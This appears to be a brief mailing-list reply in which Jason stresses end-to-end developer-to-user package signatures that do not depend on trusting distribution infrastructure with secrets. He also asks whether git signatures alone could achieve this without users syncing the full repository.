1 |
Hello Rich, |
2 |
|
3 |
There's a lot of text there, and rather than trying to parse all of |
4 |
that, I'll just reiterate a primary important design goal that might |
5 |
be overlooked: |
6 |
|
7 |
- End to end signatures from the developer to the user. |
8 |
|
9 |
This means that no matter the operation infra does before shipping it |
10 |
out to the user, the user still needs to verify that the packages came |
11 |
from the developers. In other words, whatever complicated mechanism |
12 |
you propose, it needs to not rely on trusting infra to hold onto any |
13 |
secrets. For example, I don't know whether this is attainable with the |
14 |
the git signatures alone, without requiring users to sync the entire |
15 |
git repository, which might not be acceptable for some. |
16 |
|
17 |
Jason |